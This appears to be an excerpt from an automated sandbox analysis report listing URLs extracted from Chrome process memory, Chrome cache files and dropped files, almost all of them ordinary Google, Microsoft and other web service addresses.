Source: chrome.exe, 00000011.00000003.1972624316.0000085C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000011.00000002.2057731265.0000085C0079C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_202309180
Source: chrome.exe, 00000011.00000002.2057731265.0000085C0079C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusP
Source: chrome.exe, 00000011.00000002.2057484393.0000085C00754000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000011.00000002.2062450195.0000250C00320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008862570.0000250C00BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000011.00000003.1974990599.0000250C001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api%
Source: chrome.exe, 00000011.00000002.2061215696.0000250C000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000011.00000002.2062809117.0000250C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002350605.0000250C01328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002147574.0000250C01278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000011.00000002.2061215696.0000250C000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000011.00000002.2061215696.0000250C000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000011.00000002.2062574243.0000250C00360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061215696.0000250C000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000011.00000002.2064025241.0000250C0075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067153879.0000250C00FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063143368.0000250C004DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000011.00000002.2066836064.0000250C00E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000011.00000002.2066836064.0000250C00E70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000011.00000002.2066836064.0000250C00E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000011.00000002.2064998835.0000250C00A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000011.00000003.2008482582.0000250C00F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066537543.0000250C00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2024858176.0000250C01A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066537543.0000250C00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066736485.0000250C00E52000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2024858176.0000250C01A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066083441.0000250C00CEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066537543.0000250C00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062070610.0000250C002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2024858176.0000250C01A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066083441.0000250C00CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062070610.0000250C002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066083441.0000250C00CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066537543.0000250C00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2024858176.0000250C01A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066537543.0000250C00DE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066512275.0000250C00DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066537543.0000250C00DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2024858176.0000250C01A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000011.00000003.1975843997.0000250C002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/
Source: chrome.exe, 00000011.00000002.2064645333.0000250C00983000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064998835.0000250C00A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000011.00000003.1989759004.0000250C01140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989545377.0000250C010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_89.19.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000011.00000002.2067374503.0000250C010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=truedll%
Source: chromecache_86.19.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_86.19.dr	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000011.00000002.2064998835.0000250C00A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000011.00000002.2060775857.0000250C00098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000011.00000003.1975843997.0000250C002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: chrome.exe, 00000011.00000002.2060812721.0000250C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000011.00000002.2064109486.0000250C007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067204677.0000250C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064055961.0000250C00789000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000011.00000002.2064109486.0000250C007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067204677.0000250C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064055961.0000250C00789000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000011.00000002.2062809117.0000250C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002350605.0000250C01328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002147574.0000250C01278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: jw4wb1.12.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: jw4wb1.12.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: jw4wb1.12.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: jw4wb1.12.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: chrome.exe, 00000011.00000002.2064968329.0000250C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chromecache_86.19.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: cjw47q.12.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: cjw47q.12.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Passenger.8.dr, Convinced.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000011.00000003.1975843997.0000250C002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000011.00000002.2065210249.0000250C00ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char%
Source: chrome.exe, 00000011.00000002.2065764987.0000250C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000011.00000002.2065631862.0000250C00BA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000011.00000002.2064615660.0000250C00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000011.00000002.2064615660.0000250C00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2066382226.0000250C00D90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2064139206.0000250C007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2061625882.0000250C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000011.00000002.2064025241.0000250C0075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063349484.0000250C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2062070610.0000250C002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063143368.0000250C004DC000.00000004.00000800.00020000.00000000.sdmp, 8900hv.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000011.00000002.2062809117.0000250C0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002350605.0000250C01328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002147574.0000250C01278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000011.00000003.2002429845.0000250C01330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000011.00000003.1989353177.0000250C00398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit%
Source: chrome.exe, 00000011.00000002.2064968329.0000250C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undoapplication/ogg
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000011.00000003.1975843997.0000250C002A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_86.19.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_86.19.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000011.00000003.2018064068.0000250C016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018394824.0000250C016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018363158.0000250C016DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018421659.0000250C016E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018013216.0000250C016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018212169.0000250C016B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018172576.0000250C016B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2017932987.0000250C016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018329693.0000250C016D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018295268.0000250C016C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018108517.0000250C016AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018256213.0000250C016C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000011.00000003.2009074644.0000250C0140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000011.00000002.2067263524.0000250C01070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000011.00000002.2067263524.0000250C01070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.om
Source: chrome.exe, 00000011.00000003.1995794002.0000250C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000011.00000002.2065566347.0000250C00B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063086757.0000250C004AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chromecache_89.19.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_89.19.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_89.19.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000011.00000003.2006455503.0000250C01278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006068837.0000250C00FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002147574.0000250C01278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006093450.0000250C012C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2067727250.0000250C012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006563335.0000250C01294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2008120084.0000250C0135C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
